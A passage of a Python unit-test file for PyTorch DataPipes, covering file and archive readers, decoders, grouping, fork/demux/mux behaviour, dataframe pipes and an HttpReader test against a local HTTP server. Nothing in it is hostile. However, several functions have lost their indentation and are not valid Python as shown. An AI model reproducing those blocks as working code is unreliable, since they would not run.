            self.assertTrue((pathname in self.temp_files) or (pathname in self.temp_sub_files))
        self.assertEqual(count, len(self.temp_files) + len(self.temp_sub_files))
    def test_loadfilesfromdisk_iterable_datapipe(self):
        """FileLoader yields (path, stream) pairs whose stream matches on-disk bytes."""
        # test import datapipe class directly
        from torch.utils.data.datapipes.iter import (
            FileLister,
            FileLoader,
        )
        temp_dir = self.temp_dir.name
        datapipe1 = FileLister(temp_dir, '')
        datapipe2 = FileLoader(datapipe1)
        count = 0
        for rec in datapipe2:
            count = count + 1
            self.assertTrue(rec[0] in self.temp_files)
            with open(rec[0], 'rb') as f:
                self.assertEqual(rec[1].read(), f.read())
            rec[1].close()
        self.assertEqual(count, len(self.temp_files))
    def test_readfilesfromtar_iterable_datapipe(self):
        """TarArchiveReader extracts (name, stream) entries; also checks reset behavior."""
        temp_dir = self.temp_dir.name
        temp_tarfile_pathname = os.path.join(temp_dir, "test_tar.tar")
        with tarfile.open(temp_tarfile_pathname, "w:gz") as tar:
            tar.add(self.temp_files[0])
            tar.add(self.temp_files[1])
            tar.add(self.temp_files[2])
        datapipe1 = dp.iter.FileLister(temp_dir, '*.tar')
        datapipe2 = dp.iter.FileLoader(datapipe1)
        datapipe3 = dp.iter.TarArchiveReader(datapipe2)
        # Test Case: Read extracted files before reaching the end of the tarfile
        for rec, temp_file in itertools.zip_longest(datapipe3, self.temp_files):
            self.assertTrue(rec is not None and temp_file is not None)
            self.assertEqual(os.path.basename(rec[0]), os.path.basename(temp_file))
            with open(temp_file, 'rb') as f:
                self.assertEqual(rec[1].read(), f.read())
            rec[1].close()
        # Test Case: Read extracted files after reaching the end of the tarfile
        data_refs = list(datapipe3)
        self.assertEqual(len(data_refs), len(self.temp_files))
        for data_ref, temp_file in zip(data_refs, self.temp_files):
            self.assertEqual(os.path.basename(data_ref[0]), os.path.basename(temp_file))
            with open(temp_file, 'rb') as f:
                self.assertEqual(data_ref[1].read(), f.read())
            data_ref[1].close()
        # Test Case: reset the DataPipe after reading part of it
        n_elements_before_reset = 1
        res_before_reset, res_after_reset = reset_after_n_next_calls(datapipe3, n_elements_before_reset)
        # Check result accumulated before reset
        self.assertEqual(len(res_before_reset), n_elements_before_reset)
        for ele_before_reset, temp_file in zip(res_before_reset, self.temp_files):
            self.assertEqual(os.path.basename(ele_before_reset[0]), os.path.basename(temp_file))
            with open(temp_file, 'rb') as f:
                self.assertEqual(ele_before_reset[1].read(), f.read())
            ele_before_reset[1].close()
        # Check result accumulated after reset
        self.assertEqual(len(res_after_reset), len(self.temp_files))
        for ele_after_reset, temp_file in zip(res_after_reset, self.temp_files):
            self.assertEqual(os.path.basename(ele_after_reset[0]), os.path.basename(temp_file))
            with open(temp_file, 'rb') as f:
                self.assertEqual(ele_after_reset[1].read(), f.read())
            ele_after_reset[1].close()
    # This test throws a warning because data_stream in side ZipArchiveReader cannot be closed
    # due to the way zipfiles.open() is implemented
    def test_readfilesfromzip_iterable_datapipe(self):
        """ZipArchiveReader counterpart of the tar test above, incl. reset behavior."""
        temp_dir = self.temp_dir.name
        temp_zipfile_pathname = os.path.join(temp_dir, "test_zip.zip")
        with zipfile.ZipFile(temp_zipfile_pathname, 'w') as myzip:
            myzip.write(self.temp_files[0])
            myzip.write(self.temp_files[1])
            myzip.write(self.temp_files[2])
        datapipe1 = dp.iter.FileLister(temp_dir, '*.zip')
        datapipe2 = dp.iter.FileLoader(datapipe1)
        datapipe3 = dp.iter.ZipArchiveReader(datapipe2)
        # Test Case: read extracted files before reaching the end of the zipfile
        for rec, temp_file in itertools.zip_longest(datapipe3, self.temp_files):
            self.assertTrue(rec is not None and temp_file is not None)
            self.assertEqual(os.path.basename(rec[0]), os.path.basename(temp_file))
            with open(temp_file, 'rb') as f:
                self.assertEqual(rec[1].read(), f.read())
            rec[1].close()
        # Test Case: read extracted files after reaching the end of the zipile
        data_refs = list(datapipe3)
        self.assertEqual(len(data_refs), len(self.temp_files))
        for data_ref, temp_file in zip(data_refs, self.temp_files):
            self.assertEqual(os.path.basename(data_ref[0]), os.path.basename(temp_file))
            with open(temp_file, 'rb') as f:
                self.assertEqual(data_ref[1].read(), f.read())
            data_ref[1].close()
        # Test Case: reset the DataPipe after reading part of it
        n_elements_before_reset = 1
        res_before_reset, res_after_reset = reset_after_n_next_calls(datapipe3, n_elements_before_reset)
        # Check the results accumulated before reset
        self.assertEqual(len(res_before_reset), n_elements_before_reset)
        for ele_before_reset, temp_file in zip(res_before_reset, self.temp_files):
            self.assertEqual(os.path.basename(ele_before_reset[0]), os.path.basename(temp_file))
            with open(temp_file, 'rb') as f:
                self.assertEqual(ele_before_reset[1].read(), f.read())
            ele_before_reset[1].close()
        # Check the results accumulated after reset
        self.assertEqual(len(res_after_reset), len(self.temp_files))
        for ele_after_reset, temp_file in zip(res_after_reset, self.temp_files):
            self.assertEqual(os.path.basename(ele_after_reset[0]), os.path.basename(temp_file))
            with open(temp_file, 'rb') as f:
                self.assertEqual(ele_after_reset[1].read(), f.read())
            ele_after_reset[1].close()
    def test_routeddecoder_iterable_datapipe(self):
        """RoutedDecoder dispatches by extension; handler order decides who decodes .png."""
        temp_dir = self.temp_dir.name
        temp_pngfile_pathname = os.path.join(temp_dir, "test_png.png")
        png_data = np.array([[[1., 0., 0.], [1., 0., 0.]], [[1., 0., 0.], [1., 0., 0.]]], dtype=np.single)
        np.save(temp_pngfile_pathname, png_data)
        datapipe1 = dp.iter.FileLister(temp_dir, ['*.png', '*.txt'])
        datapipe2 = dp.iter.FileLoader(datapipe1)
        def _png_decoder(extension, data):
            if extension != 'png':
                return None
            return np.load(data)
        # NOTE: the `dp` parameter intentionally shadows the module alias inside this helper.
        def _helper(prior_dp, dp, channel_first=False):
            # Byte stream is not closed
            for inp in prior_dp:
                self.assertFalse(inp[1].closed)
            for inp, rec in zip(prior_dp, dp):
                ext = os.path.splitext(rec[0])[1]
                if ext == '.png':
                    expected = np.array([[[1., 0., 0.], [1., 0., 0.]], [[1., 0., 0.], [1., 0., 0.]]], dtype=np.single)
                    if channel_first:
                        expected = expected.transpose(2, 0, 1)
                    self.assertEqual(rec[1], expected)
                else:
                    with open(rec[0], 'rb') as f:
                        self.assertEqual(rec[1], f.read().decode('utf-8'))
                # Corresponding byte stream is closed by Decoder
                self.assertTrue(inp[1].closed)
        cached = list(datapipe2)
        datapipe3 = dp.iter.RoutedDecoder(cached, _png_decoder)
        datapipe3.add_handler(decoder_basichandlers)
        _helper(cached, datapipe3)
        cached = list(datapipe2)
        datapipe4 = dp.iter.RoutedDecoder(cached, decoder_basichandlers)
        datapipe4.add_handler(_png_decoder)
        _helper(cached, datapipe4, channel_first=True)
    def test_groupby_iterable_datapipe(self):
        """Grouper pairs tar entries by basename stem with group_size=2."""
        temp_dir = self.temp_dir.name
        temp_tarfile_pathname = os.path.join(temp_dir, "test_tar.tar")
        file_list = [
            "a.png", "b.png", "c.json", "a.json", "c.png", "b.json", "d.png",
            "d.json", "e.png", "f.json", "g.png", "f.png", "g.json", "e.json",
            "h.txt", "h.json"]
        with tarfile.open(temp_tarfile_pathname, "w:gz") as tar:
            for file_name in file_list:
                file_pathname = os.path.join(temp_dir, file_name)
                with open(file_pathname, 'w') as f:
                    f.write('12345abcde')
                tar.add(file_pathname)
        datapipe1 = dp.iter.FileLister(temp_dir, '*.tar')
        datapipe2 = dp.iter.FileLoader(datapipe1)
        datapipe3 = dp.iter.TarArchiveReader(datapipe2)
        def group_fn(data):
            filepath, _ = data
            return os.path.basename(filepath).split(".")[0]
        datapipe4 = dp.iter.Grouper(datapipe3, group_key_fn=group_fn, group_size=2)
        def order_fn(data):
            data.sort(key=lambda f: f[0], reverse=True)
            return data
        datapipe5 = dp.iter.Mapper(datapipe4, fn=order_fn)  # type: ignore[var-annotated]
        expected_result = [
            ("a.png", "a.json"), ("c.png", "c.json"), ("b.png", "b.json"), ("d.png", "d.json"),
            ("f.png", "f.json"), ("g.png", "g.json"), ("e.png", "e.json"), ("h.txt", "h.json")]
        count = 0
        for rec, expected in zip(datapipe5, expected_result):
            count = count + 1
            self.assertEqual(os.path.basename(rec[0][0]), expected[0])
            self.assertEqual(os.path.basename(rec[1][0]), expected[1])
            for i in [0, 1]:
                self.assertEqual(rec[i][1].read(), b'12345abcde')
                rec[i][1].close()
        self.assertEqual(count, 8)
    def test_demux_mux_datapipe(self):
        """demux splits by classifier; mux round-robins children back together."""
        numbers = NumbersDataset(10)
        n1, n2 = numbers.demux(2, lambda x: x % 2)
        self.assertEqual([0, 2, 4, 6, 8], list(n1))
        self.assertEqual([1, 3, 5, 7, 9], list(n2))
        numbers = NumbersDataset(10)
        n1, n2, n3 = numbers.demux(3, lambda x: x % 3)
        n = n1.mux(n2, n3)
        self.assertEqual(list(range(10)), list(n))
        # Test Case: Uneven DataPipes
        source_numbers = list(range(0, 10)) + [10, 12]
        numbers_dp = dp.iter.IterableWrapper(source_numbers)
        n1, n2 = numbers_dp.demux(2, lambda x: x % 2)
        self.assertEqual([0, 2, 4, 6, 8, 10, 12], list(n1))
        self.assertEqual([1, 3, 5, 7, 9], list(n2))
        n = n1.mux(n2)
        self.assertEqual(source_numbers, list(n))
    @suppress_warnings  # Suppress warning for lambda fn
    def test_map_with_col_file_handle_datapipe(self):
        """map(input_col=1) on (path, stream) pairs equals mapping the full tuple."""
        temp_dir = self.temp_dir.name
        datapipe1 = dp.iter.FileLister(temp_dir, '')
        datapipe2 = dp.iter.FileLoader(datapipe1)
        def _helper(datapipe):
            dp1 = datapipe.map(lambda x: x.read(), input_col=1)
            dp2 = datapipe.map(lambda x: (x[0], x[1].read()))
            self.assertEqual(list(dp1), list(dp2))
        # tuple
        _helper(datapipe2)
        # list
        datapipe3 = datapipe2.map(lambda x: list(x))
        _helper(datapipe3)
class TestDataFramesPipes(TestCase):
    """
    Compare dataframe-backed pipes against equivalent plain DataPipes.
    Most of these tests will fail if pandas is installed but dill is not
    available. Need to rework them to avoid multiple skips.
    """
    def _get_datapipe(self, range=10, dataframe_size=7):
        # Plain (i, i % 3) tuple pipe used as the reference.
        return NumbersDataset(range) \
            .map(lambda i: (i, i % 3))
    def _get_dataframes_pipe(self, range=10, dataframe_size=7):
        # Same data, but carried as dataframes with columns ('i', 'j').
        return NumbersDataset(range) \
            .map(lambda i: (i, i % 3)) \
            ._to_dataframes_pipe(
                columns=['i', 'j'],
                dataframe_size=dataframe_size)
    @skipIfNoDataFrames
    @skipIfNoDill  # TODO(VitalyFedyunin): Decouple tests from dill by avoiding lambdas in map
    def test_capture(self):
        dp_numbers = self._get_datapipe().map(lambda x: (x[0], x[1], x[1] + 3 * x[0]))
        df_numbers = self._get_dataframes_pipe()
        df_numbers['k'] = df_numbers['j'] + df_numbers.i * 3
        self.assertEqual(list(dp_numbers), list(df_numbers))
    @skipIfNoDataFrames
    @skipIfNoDill
    def test_shuffle(self):
        # With non-zero (but extremely low) probability (when shuffle do nothing),
        # this test fails, so feel free to restart
        df_numbers = self._get_dataframes_pipe(range=1000).shuffle()
        dp_numbers = self._get_datapipe(range=1000)
        df_result = [tuple(item) for item in df_numbers]
        self.assertNotEqual(list(dp_numbers), df_result)
        self.assertEqual(list(dp_numbers), sorted(df_result))
    @skipIfNoDataFrames
    @skipIfNoDill
    def test_batch(self):
        df_numbers = self._get_dataframes_pipe(range=100).batch(8)
        df_numbers_list = list(df_numbers)
        last_batch = df_numbers_list[-1]
        # 100 % 8 == 4 elements remain in the final partial batch.
        self.assertEqual(4, len(last_batch))
        unpacked_batch = [tuple(row) for row in last_batch]
        self.assertEqual([(96, 0), (97, 1), (98, 2), (99, 0)], unpacked_batch)
    @skipIfNoDataFrames
    @skipIfNoDill
    def test_unbatch(self):
        # unbatch(2) undoes both nested batch levels.
        df_numbers = self._get_dataframes_pipe(range=100).batch(8).batch(3)
        dp_numbers = self._get_datapipe(range=100)
        self.assertEqual(list(dp_numbers), list(df_numbers.unbatch(2)))
    @skipIfNoDataFrames
    @skipIfNoDill
    def test_filter(self):
        df_numbers = self._get_dataframes_pipe(range=10).filter(lambda x: x.i > 5)
        self.assertEqual([(6, 0), (7, 1), (8, 2), (9, 0)], list(df_numbers))
class FileLoggerSimpleHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    """SimpleHTTPRequestHandler variant that can mirror its access log to a file."""
    def __init__(self, *args, logfile=None, **kwargs):
        # Open the log file first: super().__init__ services the request
        # synchronously, so the handle must exist before log_message is called.
        self.__loggerHandle = open(logfile, 'a+') if logfile is not None else None
        super().__init__(*args, **kwargs)
    def log_message(self, format, *args):
        """Append one access-log line to the log file; no-op when logging is off."""
        handle = self.__loggerHandle
        if handle is not None:
            entry = "%s - - [%s] %s\n" % (self.address_string(),
                                          self.log_date_time_string(),
                                          format % args)
            handle.write(entry)
    def finish(self):
        """Close the log file, then run normal request teardown."""
        if self.__loggerHandle is not None:
            self.__loggerHandle.close()
        super().finish()
def setUpLocalServerInThread():
    """Start a local HTTP file server on an ephemeral port in a background thread.

    Returns:
        (server_thread, "host:port" address string, TCPServer instance).
        The caller owns shutdown: call server.shutdown() and join the thread.

    Fix: the original wrapped the body in `try: ... except Exception: raise`,
    which is a no-op that only obscured the control flow; removed.
    """
    Handler = partial(FileLoggerSimpleHTTPRequestHandler, logfile=None)
    socketserver.TCPServer.allow_reuse_address = True
    server = socketserver.TCPServer(("", 0), Handler)  # port 0 -> OS picks a free port
    server_addr = "{host}:{port}".format(host=server.server_address[0], port=server.server_address[1])
    server_thread = threading.Thread(target=server.serve_forever)
    server_thread.start()
    # Wait a bit for the server to come up
    time.sleep(3)
    return (server_thread, server_addr, server)
def create_temp_files_for_serving(tmp_dir, file_count, file_size,
                                  file_url_template):
    """Create `file_count` random-content files of exactly `file_size` bytes in
    `tmp_dir`, plus an index file "urls_list" containing one URL per data file
    (rendered from `file_url_template`, which has a `{num}` placeholder).

    Fix: the original re-opened each data file with open(f, 'ab+') for every
    16 MiB chunk inside the while loop; the file is now opened once per file
    and chunks are appended to the same handle (same bytes written).
    """
    furl_local_file = os.path.join(tmp_dir, "urls_list")
    with open(furl_local_file, 'w') as fsum:
        for i in range(file_count):
            f = os.path.join(tmp_dir, "webfile_test_{num}.data".format(num=i))
            write_chunk = 1024 * 1024 * 16  # write at most 16 MiB per chunk
            rmn_size = file_size
            with open(f, 'ab+') as fout:
                while rmn_size > 0:
                    chunk = min(rmn_size, write_chunk)
                    fout.write(os.urandom(chunk))
                    rmn_size -= chunk
            fsum.write(file_url_template.format(num=i))
class TestIterableDataPipeHttp(TestCase):
    """HttpReader tests served by a real local HTTP server (started once per
    class in setUpClass, torn down in tearDownClass). The heavy tests are
    permanently skipped for CI timing reasons."""
    __server_thread: threading.Thread
    __server_addr: str
    __server: socketserver.TCPServer
    @classmethod
    def setUpClass(cls):
        try:
            (cls.__server_thread, cls.__server_addr,
             cls.__server) = setUpLocalServerInThread()
        except Exception as e:
            warnings.warn("TestIterableDataPipeHttp could\
                          not set up due to {0}".format(str(e)))
    @classmethod
    def tearDownClass(cls):
        try:
            cls.__server.shutdown()
            cls.__server_thread.join(timeout=15)
        except Exception as e:
            warnings.warn("TestIterableDataPipeHttp could\
                          not tear down (clean up temp directory or terminate\
                          local server) due to {0}".format(str(e)))
    def _http_test_base(self, test_file_size, test_file_count, timeout=None,
                        chunk=None):
        """Serve random files locally and verify HttpReader round-trips them.

        When `chunk` is given, StreamReader must yield exactly chunk-sized
        pieces; otherwise each file arrives whole (test_file_size bytes).
        """
        def _get_data_from_tuple_fn(data, *args, **kwargs):
            return data[args[0]]
        with tempfile.TemporaryDirectory(dir=os.getcwd()) as tmpdir:
            # create tmp dir and files for test
            base_tmp_dir = os.path.basename(os.path.normpath(tmpdir))
            file_url_template = ("http://{server_addr}/{tmp_dir}/"
                                 "/webfile_test_{num}.data\n")\
                .format(server_addr=self.__server_addr, tmp_dir=base_tmp_dir,
                        num='{num}')
            create_temp_files_for_serving(tmpdir, test_file_count,
                                          test_file_size, file_url_template)
            datapipe_dir_f = dp.iter.FileLister(tmpdir, '*_list')
            datapipe_stream = dp.iter.FileLoader(datapipe_dir_f)
            datapipe_f_lines = dp.iter.LineReader(datapipe_stream)
            datapipe_line_url: IterDataPipe[str] = \
                dp.iter.Mapper(datapipe_f_lines, _get_data_from_tuple_fn, (1,))
            datapipe_http = dp.iter.HttpReader(datapipe_line_url,
                                               timeout=timeout)
            datapipe_tob = dp.iter.StreamReader(datapipe_http, chunk=chunk)
            for (url, data) in datapipe_tob:
                self.assertGreater(len(url), 0)
                self.assertRegex(url, r'^http://.+\d+.data$')
                if chunk is not None:
                    self.assertEqual(len(data), chunk)
                else:
                    self.assertEqual(len(data), test_file_size)
    @unittest.skip("Stress test on large amount of files skipped\
                    due to the CI timing constraint.")
    def test_stress_http_reader_iterable_datapipes(self):
        test_file_size = 10
        # STATS: It takes about 5 hours to stress test 16 * 1024 * 1024
        # files locally
        test_file_count = 1024
        self._http_test_base(test_file_size, test_file_count)
    @unittest.skip("Test on the very large file skipped\
                    due to the CI timing constraint.")
    def test_large_files_http_reader_iterable_datapipes(self):
        # STATS: It takes about 11 mins to test a large file of 64GB locally
        test_file_size = 1024 * 1024 * 128
        test_file_count = 1
        timeout = 30
        chunk = 1024 * 1024 * 8
        self._http_test_base(test_file_size, test_file_count, timeout=timeout,
                             chunk=chunk)
class IDP_NoLen(IterDataPipe):
    # Wrapper that deliberately omits __len__, used to exercise code paths
    # that must cope with length-less DataPipes.
    def __init__(self, input_dp):
        super().__init__()
        self.input_dp = input_dp
    # Prevent in-place modification
    def __iter__(self):
        # Deep-copy plain iterables so callers can't mutate our source;
        # IterDataPipe inputs are iterated directly (they reset themselves).
        input_dp = self.input_dp if isinstance(self.input_dp, IterDataPipe) else copy.deepcopy(self.input_dp)
        for i in input_dp:
            yield i
def _fake_fn(data, *args, **kwargs):
return data
def _fake_filter_fn(data, *args, **kwargs):
return data >= 5
def _worker_init_fn(worker_id):
random.seed(123)
class TestFunctionalIterDataPipe(TestCase):
    # TODO(VitalyFedyunin): If dill installed this test fails
    def _test_picklable(self):
        """Mapper/Collator/Filter pickle cleanly with plain functions, but warn
        at construction and raise at pickle time when given lambdas."""
        arr = range(10)
        picklable_datapipes: List[Tuple[Type[IterDataPipe], IterDataPipe, Tuple, Dict[str, Any]]] = [
            (dp.iter.Mapper, dp.iter.IterableWrapper(arr), (), {}),
            (dp.iter.Mapper, dp.iter.IterableWrapper(arr), (_fake_fn, (0, ), {'test': True}), {}),
            (dp.iter.Collator, dp.iter.IterableWrapper(arr), (), {}),
            (dp.iter.Collator, dp.iter.IterableWrapper(arr), (_fake_fn, (0, ), {'test': True}), {}),
            (dp.iter.Filter, dp.iter.IterableWrapper(arr), (_fake_filter_fn, (0, ), {'test': True}), {}),
        ]
        for dpipe, input_dp, dp_args, dp_kwargs in picklable_datapipes:
            p = pickle.dumps(dpipe(input_dp, *dp_args, **dp_kwargs)) # type: ignore[call-arg]
        unpicklable_datapipes: List[Tuple[Type[IterDataPipe], IterDataPipe, Tuple, Dict[str, Any]]] = [
            (dp.iter.Mapper, dp.iter.IterableWrapper(arr), (lambda x: x, ), {}),
            (dp.iter.Collator, dp.iter.IterableWrapper(arr), (lambda x: x, ), {}),
            (dp.iter.Filter, dp.iter.IterableWrapper(arr), (lambda x: x >= 5, ), {}),
        ]
        for dpipe, input_dp, dp_args, dp_kwargs in unpicklable_datapipes:
            with warnings.catch_warnings(record=True) as wa:
                datapipe = dpipe(input_dp, *dp_args, **dp_kwargs) # type: ignore[call-arg]
                self.assertEqual(len(wa), 1)
                self.assertRegex(str(wa[0].message), r"^Lambda function is not supported for pickle")
                with self.assertRaises(AttributeError):
                    p = pickle.dumps(datapipe)
    def test_iterable_wrapper_datapipe(self):
        """IterableWrapper: ordering, deepcopy-on-first-read vs shallow mode,
        reset behavior, and __len__ delegation."""
        input_ls = list(range(10))
        input_dp = dp.iter.IterableWrapper(input_ls)
        # Functional Test: values are unchanged and in the same order
        self.assertEqual(input_ls, list(input_dp))
        # Functional Test: deep copy by default when an iterator is initialized (first element is read)
        it = iter(input_dp)
        self.assertEqual(0, next(it))  # The deep copy only happens when the first element is read
        input_ls.append(50)
        self.assertEqual(list(range(1, 10)), list(it))
        # Functional Test: shallow copy
        input_ls2 = [1, 2, 3]
        input_dp_shallow = dp.iter.IterableWrapper(input_ls2, deepcopy=False)
        input_ls2.append(10)
        self.assertEqual([1, 2, 3, 10], list(input_dp_shallow))
        # Reset Test: reset the DataPipe
        input_ls = list(range(10))
        input_dp = dp.iter.IterableWrapper(input_ls)
        n_elements_before_reset = 5
        res_before_reset, res_after_reset = reset_after_n_next_calls(input_dp, n_elements_before_reset)
        self.assertEqual(input_ls[:n_elements_before_reset], res_before_reset)
        self.assertEqual(input_ls, res_after_reset)
        # __len__ Test: inherits length from sequence
        self.assertEqual(len(input_ls), len(input_dp))
def test_concat_datapipe(self):
input_dp1 = dp.iter.IterableWrapper(range(10))
input_dp2 = dp.iter.IterableWrapper(range(5))
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.iter.Concater()
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `IterDataPipe`"):
dp.iter.Concater(input_dp1, ()) # type: ignore[arg-type]
concat_dp = input_dp1.concat(input_dp2)
self.assertEqual(len(concat_dp), 15)
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
# Test Reset
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
input_dp_nl = IDP_NoLen(range(5))
concat_dp = input_dp1.concat(input_dp_nl)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(concat_dp)
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
    def test_fork_datapipe(self):
        """Forker: child reference sharing, buffer limits, slowest-pointer logic, resets, and lengths."""
        input_dp = dp.iter.IterableWrapper(range(10))
        # num_instances must be a positive integer
        with self.assertRaises(ValueError):
            input_dp.fork(num_instances=0)
        # fork(num_instances=1) is a no-op: the source datapipe itself is returned
        dp1 = input_dp.fork(num_instances=1)
        self.assertEqual(dp1, input_dp)
        # Test Case: making sure all child DataPipe shares the same reference
        dp1, dp2, dp3 = input_dp.fork(num_instances=3)
        self.assertTrue(all(n1 is n2 and n1 is n3 for n1, n2, n3 in zip(dp1, dp2, dp3)))
        # Test Case: one child DataPipe yields all value at a time
        output1, output2, output3 = list(dp1), list(dp2), list(dp3)
        self.assertEqual(list(range(10)), output1)
        self.assertEqual(list(range(10)), output2)
        self.assertEqual(list(range(10)), output3)
        # Test Case: two child DataPipes yield value together
        dp1, dp2 = input_dp.fork(num_instances=2)
        output = []
        for n1, n2 in zip(dp1, dp2):
            output.append((n1, n2))
        self.assertEqual([(i, i) for i in range(10)], output)
        # Test Case: one child DataPipe yields all value first, but buffer_size = 5 being too small
        dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=5)
        it1 = iter(dp1)
        for _ in range(5):
            next(it1)
        # The 6th element would overflow the shared buffer since dp2 has consumed nothing
        with self.assertRaises(BufferError):
            next(it1)
        with self.assertRaises(BufferError):
            list(dp2)
        # Test Case: one child DataPipe yields all value first with unlimited buffer
        with warnings.catch_warnings(record=True) as wa:
            dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=-1)
            self.assertEqual(len(wa), 1)
            self.assertRegex(str(wa[0].message), r"Unlimited buffer size is set")
        l1, l2 = list(dp1), list(dp2)
        for d1, d2 in zip(l1, l2):
            self.assertEqual(d1, d2)
        # Test Case: two child DataPipes yield value together with buffer size 1
        dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=1)
        output = []
        for n1, n2 in zip(dp1, dp2):
            output.append((n1, n2))
        self.assertEqual([(i, i) for i in range(10)], output)
        # Test Case: make sure logic related to slowest_ptr is working properly
        dp1, dp2, dp3 = input_dp.fork(num_instances=3)
        output1, output2 , output3 = [], [], []
        for i, (n1, n2) in enumerate(zip(dp1, dp2)):
            output1.append(n1)
            output2.append(n2)
            if i == 4:  # yield all of dp3 when halfway through dp1, dp2
                output3 = list(dp3)
                break
        self.assertEqual(list(range(5)), output1)
        self.assertEqual(list(range(5)), output2)
        self.assertEqual(list(range(10)), output3)
        # Test Case: DataPipe doesn't reset if this pipe hasn't been read
        dp1, dp2 = input_dp.fork(num_instances=2)
        i1, i2 = iter(dp1), iter(dp2)
        output2 = []
        for i, n2 in enumerate(i2):
            output2.append(n2)
            if i == 4:
                i1 = iter(dp1)  # Doesn't reset because i1 hasn't been read
        self.assertEqual(list(range(10)), output2)
        # Test Case: DataPipe reset when some of it have been read
        dp1, dp2 = input_dp.fork(num_instances=2)
        i1, i2 = iter(dp1), iter(dp2)
        output1, output2 = [], []
        for i, (n1, n2) in enumerate(zip(i1, i2)):
            output1.append(n1)
            output2.append(n2)
            if i == 4:
                with warnings.catch_warnings(record=True) as wa:
                    i1 = iter(dp1)  # Resets all child DataPipes (with a warning, since some were mid-read)
                    self.assertEqual(len(wa), 1)
                    self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
        # After the reset, iteration resumes from the start: 0..4 then 0..9 again
        self.assertEqual(list(range(5)) + list(range(10)), output1)
        self.assertEqual(list(range(5)) + list(range(10)), output2)
        # Test Case: DataPipe reset, even when some other child DataPipes are not read
        dp1, dp2, dp3 = input_dp.fork(num_instances=3)
        output1, output2 = list(dp1), list(dp2)
        self.assertEqual(list(range(10)), output1)
        self.assertEqual(list(range(10)), output2)
        with warnings.catch_warnings(record=True) as wa:
            self.assertEqual(list(range(10)), list(dp1))  # Resets even though dp3 has not been read
            self.assertEqual(len(wa), 1)
            self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
        output3 = []
        for i, n3 in enumerate(dp3):
            output3.append(n3)
            if i == 4:
                with warnings.catch_warnings(record=True) as wa:
                    output1 = list(dp1)  # Resets even though dp3 is only partially read
                    self.assertEqual(len(wa), 1)
                    self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
                self.assertEqual(list(range(5)), output3)
                self.assertEqual(list(range(10)), output1)
                break
        self.assertEqual(list(range(10)), list(dp3))  # dp3 has to read from the start again
        # Test Case: Each DataPipe inherits the source datapipe's length
        dp1, dp2, dp3 = input_dp.fork(num_instances=3)
        self.assertEqual(len(input_dp), len(dp1))
        self.assertEqual(len(input_dp), len(dp2))
        self.assertEqual(len(input_dp), len(dp3))
        # Pickle Test:
        dp1, dp2, dp3 = input_dp.fork(num_instances=3)
        traverse(dp1)  # This should not raise any error
        for _ in zip(dp1, dp2, dp3):
            pass
        traverse(dp2)  # This should not raise any error either
def test_mux_datapipe(self):
# Functional Test: Elements are yielded one at a time from each DataPipe, until they are all exhausted
input_dp1 = dp.iter.IterableWrapper(range(4))
input_dp2 = dp.iter.IterableWrapper(range(4, 8))
input_dp3 = dp.iter.IterableWrapper(range(8, 12))
output_dp = input_dp1.mux(input_dp2, input_dp3)
expected_output = [0, 4, 8, 1, 5, 9, 2, 6, 10, 3, 7, 11]
self.assertEqual(len(expected_output), len(output_dp))
self.assertEqual(expected_output, list(output_dp))
# Functional Test: Uneven input Data Pipes
input_dp1 = dp.iter.IterableWrapper([1, 2, 3, 4])
input_dp2 = dp.iter.IterableWrapper([10])
input_dp3 = dp.iter.IterableWrapper([100, 200, 300])
output_dp = input_dp1.mux(input_dp2, input_dp3)
expected_output = [1, 10, 100, 2, 200, 3, 300, 4]
self.assertEqual(len(expected_output), len(output_dp))
self.assertEqual(expected_output, list(output_dp))
# Functional Test: Empty Data Pipe
input_dp1 = dp.iter.IterableWrapper([0, 1, 2, 3])
input_dp2 = dp.iter.IterableWrapper([])
output_dp = input_dp1.mux(input_dp2)
self.assertEqual(len(input_dp1), len(output_dp))
self.assertEqual(list(input_dp1), list(output_dp))
# __len__ Test: raises TypeError when __len__ is called and an input doesn't have __len__
input_dp1 = dp.iter.IterableWrapper(range(10))
input_dp_no_len = IDP_NoLen(range(10))
output_dp = input_dp1.mux(input_dp_no_len)
with self.assertRaises(TypeError):
len(output_dp)
    def test_demux_datapipe(self):
        """Demultiplexer: classification into children, buffering, resets, drop_none, and __len__."""
        input_dp = dp.iter.IterableWrapper(range(10))
        # num_instances must be a positive integer
        with self.assertRaises(ValueError):
            input_dp.demux(num_instances=0, classifier_fn=lambda x: 0)
        # Test Case: split into 2 DataPipes and output them one at a time
        dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
        output1, output2 = list(dp1), list(dp2)
        self.assertEqual(list(range(0, 10, 2)), output1)
        self.assertEqual(list(range(1, 10, 2)), output2)
        # Test Case: split into 2 DataPipes and output them together
        dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
        output = []
        for n1, n2 in zip(dp1, dp2):
            output.append((n1, n2))
        self.assertEqual([(i, i + 1) for i in range(0, 10, 2)], output)
        # Test Case: values of the same classification are lumped together, and buffer_size = 4 being too small
        dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: 0 if x >= 5 else 1, buffer_size=4)
        it1 = iter(dp1)
        with self.assertRaises(BufferError):
            next(it1)  # Buffer raises because the first 5 elements all belong to a different child
        with self.assertRaises(BufferError):
            list(dp2)
        # Test Case: values of the same classification are lumped together, and buffer_size = 5 is just enough
        dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: 0 if x >= 5 else 1, buffer_size=5)
        output1, output2 = list(dp1), list(dp2)
        self.assertEqual(list(range(5, 10)), output1)
        self.assertEqual(list(range(0, 5)), output2)
        # Test Case: values of the same classification are lumped together, and unlimited buffer
        with warnings.catch_warnings(record=True) as wa:
            dp1, dp2 = input_dp.demux(
                num_instances=2,
                classifier_fn=lambda x: 0 if x >= 5 else 1,
                buffer_size=-1
            )
